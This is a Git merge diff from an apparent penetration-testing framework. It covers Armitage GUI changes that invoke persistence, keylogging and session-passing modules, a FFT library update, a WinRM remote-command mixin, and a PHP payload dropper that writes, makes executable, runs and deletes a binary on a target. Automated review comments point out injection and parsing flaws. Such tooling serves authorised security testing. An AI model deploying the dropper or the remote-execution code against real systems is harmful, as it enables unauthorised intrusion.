Merge branch 'master' into bug/wrong-file_changed-argument

Conflicts:
	lib/msf/core/modules/loader/base.rb
unstable
Luke Imhoff 2012-10-24 15:21:46 -05:00
commit 055f95898d
405 changed files with 4031 additions and 1454 deletions


@ -37,7 +37,7 @@ namespace :yard do
task :stats => :environment do
stats = YARD::CLI::Stats.new
yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files
stats.run *yard_arguments
stats.run(*yard_arguments)
end
end

Binary file not shown.

Binary file not shown.


@ -1,6 +1,23 @@
Armitage Changelog
==================
16 Oct 12 (tested against msf 15972)
---------
- Added port 5985 to MSF Scans list.
- Meterpreter -> Access -> Persistence sets ACTION option for you
- Changed how LHOST and LPORT are set globally to prevent Ruby
character encoding conversion error in the framework.
- Pass Session, Log Keystrokes, and Persist now query module info
in a separate thread (avoids a deadlock opportunity)
- Armitage now shows folder/URL in a popup dialog for environments
where JDesktop API to open them directly is not supported
- Check all credentials option now filters the list to avoid trying
a pair of credentials twice.
- Armitage's exploit payload selection now selects cmd/unix/interact
when appropriate.
- Explore -> Processes now works with Java Meterpreter again.
- MSF Scans feature now runs http_version against port 443
5 Sept 12 (tested against msf r15804)
---------
- Setup dialog now trims host, port, user, and pass fields.

2
external/ruby-kissfft/Gemfile vendored Executable file

@ -0,0 +1,2 @@
source "http://rubygems.org"
gemspec


@ -1,7 +1,8 @@
Kiss FFT library
==================
Copyright (c) 2003-2006 Mark Borgerding
Copyright (c) 2003-2010 Mark Borgerding
All rights reserved.
@ -13,11 +14,10 @@ Redistribution and use in source and binary forms, with or without modification,
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Ruby wrapper layer
==================
Copyright (C) 2009 H D Moore
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
All rights reserved.

1
external/ruby-kissfft/Rakefile vendored Executable file

@ -0,0 +1 @@
require "bundler/gem_tasks"


@ -1,5 +1,5 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
Copyright (c) 2003-2010, Mark Borgerding
All rights reserved.
@ -148,3 +148,17 @@ struct kiss_fft_state{
/* a debugging function */
#define pcpx(c)\
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )
#ifdef KISS_FFT_USE_ALLOCA
// define this to allow use of alloca instead of malloc for temporary buffers
// Temporary buffers are used in two case:
// 1. FFT sizes that have "bad" factors. i.e. not 2,3 and 5
// 2. "in-place" FFTs. Notice the quotes, since kissfft does not really do an in-place transform.
#include <alloca.h>
#define KISS_FFT_TMP_ALLOC(nbytes) alloca(nbytes)
#define KISS_FFT_TMP_FREE(ptr)
#else
#define KISS_FFT_TMP_ALLOC(nbytes) KISS_FFT_MALLOC(nbytes)
#define KISS_FFT_TMP_FREE(ptr) KISS_FFT_FREE(ptr)
#endif


@ -1,5 +1,5 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
Copyright (c) 2003-2010, Mark Borgerding
All rights reserved.
@ -18,21 +18,6 @@ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
fixed or floating point complex numbers. It also delares the kf_ internal functions.
*/
static kiss_fft_cpx *scratchbuf=NULL;
static size_t nscratchbuf=0;
static kiss_fft_cpx *tmpbuf=NULL;
static size_t ntmpbuf=0;
#define CHECKBUF(buf,nbuf,n) \
do { \
if ( nbuf < (size_t)(n) ) {\
free(buf); \
buf = (kiss_fft_cpx*)KISS_FFT_MALLOC(sizeof(kiss_fft_cpx)*(n)); \
nbuf = (size_t)(n); \
} \
}while(0)
static void kf_bfly2(
kiss_fft_cpx * Fout,
const size_t fstride,
@ -69,6 +54,7 @@ static void kf_bfly4(
const size_t m2=2*m;
const size_t m3=3*m;
tw3 = tw2 = tw1 = st->twiddles;
do {
@ -222,29 +208,30 @@ static void kf_bfly_generic(
kiss_fft_cpx t;
int Norig = st->nfft;
CHECKBUF(scratchbuf,nscratchbuf,p);
kiss_fft_cpx * scratch = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC(sizeof(kiss_fft_cpx)*p);
for ( u=0; u<m; ++u ) {
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
scratchbuf[q1] = Fout[ k ];
C_FIXDIV(scratchbuf[q1],p);
scratch[q1] = Fout[ k ];
C_FIXDIV(scratch[q1],p);
k += m;
}
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
int twidx=0;
Fout[ k ] = scratchbuf[0];
Fout[ k ] = scratch[0];
for (q=1;q<p;++q ) {
twidx += fstride * k;
if (twidx>=Norig) twidx-=Norig;
C_MUL(t,scratchbuf[q] , twiddles[twidx] );
C_MUL(t,scratch[q] , twiddles[twidx] );
C_ADDTO( Fout[ k ] ,t);
}
k += m;
}
}
KISS_FFT_TMP_FREE(scratch);
}
static
@ -265,7 +252,8 @@ void kf_work(
#ifdef _OPENMP
// use openmp extensions at the
// top-level (not recursive)
if (fstride==1) {
if (fstride==1 && p<=5)
{
int k;
// execute the p different work units in different threads
@ -380,14 +368,15 @@ kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem
}
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
{
if (fin == fout) {
CHECKBUF(tmpbuf,ntmpbuf,st->nfft);
//NOTE: this is not really an in-place FFT algorithm.
//It just performs an out-of-place FFT into a temp buffer
kiss_fft_cpx * tmpbuf = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC( sizeof(kiss_fft_cpx)*st->nfft);
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
KISS_FFT_TMP_FREE(tmpbuf);
}else{
kf_work( fout, fin, 1,in_stride, st->factors,st );
}
@ -399,17 +388,9 @@ void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
}
/* not really necessary to call, but if someone is doing in-place ffts, they may want to free the
buffers from CHECKBUF
*/
void kiss_fft_cleanup(void)
{
free(scratchbuf);
scratchbuf = NULL;
nscratchbuf=0;
free(tmpbuf);
tmpbuf=NULL;
ntmpbuf=0;
// nothing needed any more
}
int kiss_fft_next_fast_size(int n)


@ -5,7 +5,6 @@
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <malloc.h>
#ifdef __cplusplus
extern "C" {
@ -27,9 +26,11 @@ extern "C" {
#ifdef USE_SIMD
# include <xmmintrin.h>
# define kiss_fft_scalar __m128
#define KISS_FFT_MALLOC(nbytes) memalign(16,nbytes)
#define KISS_FFT_MALLOC(nbytes) _mm_malloc(nbytes,16)
#define KISS_FFT_FREE _mm_free
#else
#define KISS_FFT_MALLOC malloc
#define KISS_FFT_FREE free
#endif


@ -19,9 +19,9 @@ struct kiss_fftr_state{
kiss_fft_cfg substate;
kiss_fft_cpx * tmpbuf;
kiss_fft_cpx * super_twiddles;
#ifdef USE_SIMD
long pad;
#endif
#ifdef USE_SIMD
void * pad;
#endif
};
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)

16
external/ruby-kissfft/kissfft.gemspec vendored Normal file

@ -0,0 +1,16 @@
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "kissfft"
s.version = "0.0.1"
s.authors = ["HD Moore"]
s.email = ["hdm@rapid7.com"]
s.homepage = ""
s.summary = %q{Ruby wrapper around the KisFFT library for performing FFTs}
s.description = %q{Provides access to the KissFFT library for performing fast-fourier transforms from Ruby }
s.files = Dir.glob('lib/**/*.rb') + Dir.glob('ext/**/*.{c,h,rb}') + [ "LICENSE" ]
s.test_files = Dir.glob('test/**/*.{rb,data}')
s.extensions = [ 'ext/kissfft/extconf.rb' ]
s.require_paths = ["lib"]
end


@ -3,7 +3,7 @@
<center><h1>Armitage 1.44</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 5 Sept 12</p>
<br />Release: 16 Oct 12</p>
<br />
<p>Developed by:</p>


@ -349,6 +349,9 @@ sub best_payload {
else if ("java/jsp_shell_bind_tcp" in $compatible) {
return "java/jsp_shell_bind_tcp";
}
else if ("cmd/unix/interact" in $compatible) {
return "cmd/unix/interact";
}
else {
return "generic/shell_bind_tcp";
}


@ -475,7 +475,12 @@ sub gotoFile {
return lambda({
local('$exception');
try {
[[Desktop getDesktop] open: $f];
if ([Desktop isDesktopSupported]) {
[[Desktop getDesktop] open: $f];
}
else {
ask("Browse to this file:", $f);
}
}
catch $exception {
showError("Could not open $f $+ \n $+ $exception");


@ -356,6 +356,16 @@ sub _launch_dialog {
if (!isShift($1)) {
[$dialog setVisible: 0];
}
# fix some module options...
if ($command eq "windows/manage/persistence") {
if ('REXE' in $options) {
$options['ACTION'] = 'REXE';
}
else {
$options['ACTION'] = 'TEMPLATE';
}
}
# it's go time buddy... time to filter some stuff...
($type, $command, $options) = filter_data("user_launch", $type, $command, $options);


@ -188,7 +188,12 @@ sub main_attack_items {
sub gotoURL {
return lambda({
[[Desktop getDesktop] browse: $url];
if ([Desktop isDesktopSupported]) {
[[Desktop getDesktop] browse: $url];
}
else {
ask("Browse to this URL:", $url);
}
}, $url => [[new URL: $1] toURI]);
}


@ -191,11 +191,15 @@ sub showMeterpreterMenu {
}, $sid => "$sid"));
item($j, "Persist", 'P', lambda({
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
thread(lambda({
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
}, \$sid));
}, $sid => "$sid"));
item($j, "Pass Session", 'S', lambda({
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
thread(lambda({
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
}, \$sid));
}, $sid => "$sid"));
setupMenu($j, "meterpreter_access", @($sid));
@ -241,7 +245,9 @@ sub showMeterpreterMenu {
item($j, "Show Processes", 'P', lambda({ createProcessBrowser($sid); }, $sid => "$sid"));
if ("*win*" iswm $platform) {
item($j, "Log Keystrokes", 'K', lambda({
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
thread(lambda({
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
}, \$sid));
}, $sid => "$sid"));
}
@ -305,6 +311,9 @@ sub launch_msf_scans {
if ('RPORT' in %o) {
$port = %o['RPORT']['default'];
push(%ports[$port], $scanner);
if ($port == 80) {
push(%ports['443'], $scanner);
}
}
safetyCheck();
@ -313,7 +322,7 @@ sub launch_msf_scans {
# add these ports to our list of ports to scan.. these come from querying all of Metasploit's modules
# for the default ports
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902)) {
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985)) {
$temp = %ports[$port];
}
@ -343,7 +352,12 @@ sub launch_msf_scans {
if ($port in %ports) {
$modules = %ports[$port];
foreach $module ($modules) {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
if ($port == 443) {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24, SSL => "1")));
}
else {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
}
}
}
}


@ -297,19 +297,24 @@ sub show_login_dialog {
}
sub createUserPassFile {
local('$handle $user $pass $type $row $2 $name');
local('$handle $user $pass $type $row $2 $name %entries');
$name = "userpass" . rand(10000) . ".txt";
$handle = openf("> $+ $name");
# loop through our entries and store them
%entries = ohash();
foreach $row ($1) {
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
if ($type eq "password" || $type eq $2) {
println($handle, "$user $pass");
%entries["$user $pass"] = "$user $pass";
}
else {
println($handle, "$user");
%entries[$user] = $user;
}
}
# print out unique entry values
$handle = openf("> $+ $name");
printAll($handle, values(%entries));
closef($handle);
if ($client !is $mclient) {
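Review bot: The `$handle = openf("> $+ $name");` near the top of createUserPassFile (the line after `$name = ...`) appears to remain alongside the new `openf` placed just before `printAll`; if both survive on the new side, the first handle is overwritten without a `closef` and stays open until finalised, and the file is truncated twice. If the intent was to move the open next to the write, the earlier line should be removed; otherwise add `closef($handle);` before the second `openf`. The rendering drops blank lines, so I cannot confirm which of the two lines is old from the hunk counts alone. createUserPassFile continues outside the hunk.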


@ -27,6 +27,12 @@ sub parseProcessList {
# REMOVEME--this is a backwards compatability hack.
@rows = parseTextTable($2, @("PID", "Name", "Arch", "Session", "User", "Path"));
}
# this is the format for Java meterpreter
if (size(@rows) == 0) {
@rows = parseTextTable($2, @("PID", "Name", "Arch", "User", "Path"));
}
foreach $row (@rows) {
[%processes[$1] addEntry: $row];
}


@ -355,7 +355,7 @@ sub client {
sub main {
global('$client $mclient');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
@ -400,9 +400,6 @@ sub main {
$mclient = $client;
initConsolePool(); # this needs to happen... right now.
# set the LHOST to whatever the user specified
call_async($client, "core.setg", "LHOST", $host);
# we need this global to be set so our reverse listeners work as expected.
$MY_ADDRESS = $host;
@ -423,6 +420,13 @@ sub main {
$lock_lock = semaphore(1);
$cach_lock = semaphore(1);
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
$console = createConsole($client);
call($client, "console.write", $console, "setg LHOST $host $+ \n");
sleep(2000);
# absorb the output of this command which is LHOST => ...
call($client, "console.read", $console);
#
# create a thread to push console messages to the event queue for all clients.
#
@ -437,7 +441,7 @@ sub main {
release($poll_lock);
}
}
}, \$client, \$poll_lock, \@events, $console => createConsole($client));
}, \$client, \$poll_lock, \@events, \$console);
#
# Create a shared hash that contains a thread for each session...
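Review bot: The `sleep(2000)` followed by a single `console.read` after writing `setg LHOST` is a timing assumption rather than a completion check: if the framework takes longer than two seconds, the `LHOST => ...` output stays in the console and is picked up by the polling thread started a few lines later, which now shares `$console`, so it surfaces to every client as an unrelated console event. Reading in a loop until the console reports it is no longer busy (the `console.read` result carries a busy flag as far as I recall — please confirm against the RPC API) removes the fixed delay. `$host` is also spliced into the command line unquoted, so a value containing whitespace or a newline is parsed as extra arguments or a second command, which the replaced `core.setg` call did not allow; reject such values before the write. main continues outside the hunk.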


@ -152,7 +152,10 @@ sub createConsoleTab {
sub setg {
%MSF_GLOBAL[$1] = $2;
call_async($client, "core.setg", $1, $2);
local('$c');
$c = createConsole($client);
call_async($client, "console.write", $c, "setg $1 $2 $+ \n");
call_async($client, "console.release", $c);
}
sub createDefaultHandler {
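Review bot: `$2` is interpolated into `"setg $1 $2 $+ \n"` unquoted, so a value containing spaces, quotes or a newline is parsed by the console as extra arguments or a second command, whereas the removed `core.setg` call passed the value as a single RPC argument; at minimum reject values containing whitespace or `\n` before the write, or quote the value and escape embedded quotes. The three `call_async` calls also assume in-order delivery; if `console.release` can overtake `console.write`, the setg is silently lost — a comment stating the ordering guarantee, or a synchronous `call` for the write as the `setg LHOST` path in the main script uses, would make that explicit. The same interpolation concern applies to that `setg LHOST $host` write.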


@ -104,6 +104,9 @@ public class ConsoleClient implements Runnable, ActionListener {
if (destroyCommand != null) {
((RpcAsync)connection).execute_async(destroyCommand, new Object[] { session });
}
/* we don't need to keep reading from this console */
kill();
}
protected void finalize() {


@ -1,6 +1,23 @@
Armitage Changelog
==================
16 Oct 12 (tested against msf 15972)
---------
- Added port 5985 to MSF Scans list.
- Meterpreter -> Access -> Persistence sets ACTION option for you
- Changed how LHOST and LPORT are set globally to prevent Ruby
character encoding conversion error in the framework.
- Pass Session, Log Keystrokes, and Persist now query module info
in a separate thread (avoids a deadlock opportunity)
- Armitage now shows folder/URL in a popup dialog for environments
where JDesktop API to open them directly is not supported
- Check all credentials option now filters the list to avoid trying
a pair of credentials twice.
- Armitage's exploit payload selection now selects cmd/unix/interact
when appropriate.
- Explore -> Processes now works with Java Meterpreter again.
- MSF Scans feature now runs http_version against port 443
5 Sept 12 (tested against msf r15804)
---------
- Setup dialog now trims host, port, user, and pass fields.


@ -80,6 +80,12 @@ module Exploit::Remote::HttpServer
def print_debug(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
#
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def print_warning(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
@ -101,6 +107,11 @@ module Exploit::Remote::HttpServer
def vprint_debug(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def vprint_warning(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
#


@ -88,3 +88,6 @@ require 'msf/core/exploit/java'
# WBEM
require 'msf/core/exploit/wbemexec'
#WinRM
require 'msf/core/exploit/winrm'


@ -0,0 +1,88 @@
# -*- coding: binary -*-
##
# $Id$
##
###
#
# This module exposes a simple method to create an payload in an executable.
#
###
require 'msf/core/payload/php'
module Msf
module Exploit::PhpEXE
include Exploit::EXE
include Payload::Php
#
# Generate a first-stage php payload.
#
# For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?>
# markers.
#
# For target architectures other than ARCH_PHP, this will base64 encode an
# appropriate executable and drop it on the target system. After running
# it, the generated code will attempt to unlink the dropped executable which
# will certainly fail on Windows.
#
# @option opts [String] :writable_path A path on the victim where we can
# write an executable. Uses current directory if not given.
# @option opts [Boolean] :unlink_self Whether to call unlink(__FILE__); in
# the payload. Good idea for arbitrary-file-upload vulns, bad idea for
# write-to-a-config-file vulns
#
# @return [String] A PHP payload that will drop an executable for non-php
# target architectures
#
# @todo Test on Windows
def get_write_exec_payload(opts={})
case target_arch.first
when ARCH_PHP
php = payload.encoded
else
bin_name = Rex::Text.rand_text_alpha(8)
if opts[:writable_path]
bin_name = [opts[:writable_path], bin_name].join("/")
else
bin_name = "./#{bin_name}"
end
if target["Platform"] == 'win'
bin_name << ".exe"
print_debug("Unable to clean up #{bin_name}, delete it manually")
end
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q{
error_reporting(0);
$ex = "#{bin_name}";
$f = fopen($ex, "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
chmod($ex, 0777);
function my_cmd($cmd) {
#{php_preamble}
#{php_system_block};
}
if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
my_cmd($ex . "&");
} else {
my_cmd($ex);
}
unlink($ex);
}
end
if opts[:unlink_self]
php << "unlink(__FILE__);"
end
php.gsub!(/#.*$/, '')
php.gsub!(/[\t ]+/, ' ')
php.gsub!(/\n/, ' ')
return "<?php #{php} ?>"
end
end
end
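Review bot: The cleanup pass `php.gsub!(/#.*$/, '')` is not string-literal aware: it truncates any line containing `#` inside the PHP produced by `payload.encoded` (ARCH_PHP branch), by `php_preamble`/`php_system_block`, or in `bin_name` when `:writable_path` contains one, and the two whitespace `gsub!` calls collapse runs of spaces inside string literals as well. Since the hand-written template in the `else` branch carries no comments, the stripping should be restricted to whichever helper output actually contains them, with a comment saying why. Separately, `php = payload.encoded` followed by `php <<` and `gsub!` mutates that string in place; if `payload.encoded` returns a cached object (I cannot tell from here), later readers see the altered payload — `php = payload.encoded.dup` avoids it. `bin_name` is also placed inside a double-quoted PHP string without escaping, so a `:writable_path` containing `"`, `\` or `$` yields broken PHP; escaping it or rejecting such paths at the top of the method would be safer.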


@ -0,0 +1,471 @@
# -*- coding: binary -*-
require 'uri'
require 'digest'
require 'rex/proto/ntlm/crypt'
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/utils'
require 'rex/proto/ntlm/exceptions'
module Msf
module Exploit::Remote::WinRM
include Exploit::Remote::NTLM::Client
include Exploit::Remote::HttpClient
#
# Constants
#
NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt
NTLM_CONST ||= Rex::Proto::NTLM::Constants
NTLM_UTILS ||= Rex::Proto::NTLM::Utils
NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
def initialize(info = {})
super
register_options(
[
Opt::RHOST,
Opt::RPORT(5985),
OptString.new('VHOST', [ false, "HTTP server virtual host" ]),
OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]),
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ])
], self.class
)
register_autofilter_ports([ 80,443,5985,5986 ])
register_autofilter_services(%W{ winrm })
end
def winrm_poke(timeout = 20)
opts = {
'uri' => datastore['URI'],
'data' => Rex::Text.rand_text_alpha(8)
}
c = connect(opts)
to = opts[:timeout] || timeout
ctype = "application/soap+xml;charset=UTF-8"
resp, c = send_request_cgi(opts.merge({
'uri' => opts['uri'],
'method' => 'POST',
'ctype' => ctype,
'data' => opts['data']
}), to)
return resp
end
def parse_auth_methods(resp)
return [] unless resp and resp.code == 401
methods = []
methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate"
methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos"
methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic"
return methods
end
def winrm_run_cmd(cmd, timeout=20)
resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
if resp.code == 401
print_error "Login failure! Recheck supplied credentials."
return resp .code
end
unless resp.code == 200
print_error "Got unexpected response: \n #{resp.to_s}"
retval == resp.code || 0
return retval
end
shell_id = winrm_get_shell_id(resp)
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
cmd_id = winrm_get_cmd_id(resp)
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
streams = winrm_get_cmd_streams(resp)
resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id))
return streams
end
def winrm_wql_msg(wql)
action = winrm_uri_action("wql")
contents = winrm_header(action) + winrm_wql_body(wql)
msg = winrm_envelope(contents)
return msg
end
def winrm_open_shell_msg
action = winrm_uri_action("create_shell")
options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']])
header_data = action + options
contents = winrm_header(header_data) + winrm_open_shell_body
msg = winrm_envelope(contents)
return msg
end
def winrm_cmd_msg(cmd,shell_id)
action = winrm_uri_action("send_cmd")
options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']])
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + options + selectors
contents = winrm_header(header_data) + winrm_cmd_body(cmd)
msg = winrm_envelope(contents)
return msg
end
def winrm_cmd_recv_msg(shell_id,cmd_id)
action = winrm_uri_action("recv_cmd")
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + selectors
contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id)
msg = winrm_envelope(contents)
return msg
end
def winrm_terminate_cmd_msg(shell_id,cmd_id)
action = winrm_uri_action("signal_shell")
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + selectors
contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id)
msg = winrm_envelope(contents)
return msg
end
def winrm_delete_shell_msg(shell_id)
action = winrm_uri_action("delete_shell")
selectors = winrm_selector_set([['ShellId', shell_id]])
header_data = action + selectors
contents = winrm_header(header_data) + winrm_empty_body
msg = winrm_envelope(contents)
return msg
end
def parse_wql_response(response)
xml = response.body
columns = []
rows =[]
rxml = REXML::Document.new(xml).root
items = rxml.elements["///w:Items"]
items.elements.to_a("///w:XmlFragment").each do |node|
row_data = []
node.elements.to_a.each do |sub_node|
columns << sub_node.name
row_data << sub_node.text
end
rows << row_data
end
response_data = Rex::Ui::Text::Table.new(
'Header' => "#{datastore['WQL']} (#{rhost})",
'Indent' => 1,
'Columns' => columns.uniq!
)
rows.each do |row|
response_data << row
end
return response_data
end
def winrm_get_shell_id(response)
xml = response.body
shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
end
def winrm_get_cmd_id(response)
xml = response.body
cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
end
def winrm_get_cmd_streams(response)
streams = {
'stdout' => '',
'stderr' => '',
}
xml = response.body
rxml = REXML::Document.new(xml).root
rxml.elements.to_a("//rsp:Stream").each do |node|
next if node.text.nil?
streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
end
return streams
end
def generate_uuid
::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
end
def send_request_ntlm(data, timeout = 20)
opts = {
'uri' => datastore['URI'],
'data' => data,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
ntlm_options =
{
:signing => false,
:usentlm2_session => datastore['NTLM::UseNTLM2_session'],
:use_ntlmv2 => datastore['NTLM::UseNTLMv2'],
:send_lm => datastore['NTLM::SendLM'],
:send_ntlm => datastore['NTLM::SendNTLM']
}
ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
domain_name = datastore['DOMAIN']
ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name,
workstation_name,
ntlmssp_flags))
to = opts[:timeout] || timeout
begin
c = connect(opts)
ctype = "application/soap+xml;charset=UTF-8"
# First request to get the challenge
r = c.request_cgi(opts.merge({
'uri' => opts['uri'],
'method' => 'POST',
'ctype' => ctype,
'headers' => { 'Authorization' => ntlm_message_1},
'data' => opts['data']
}))
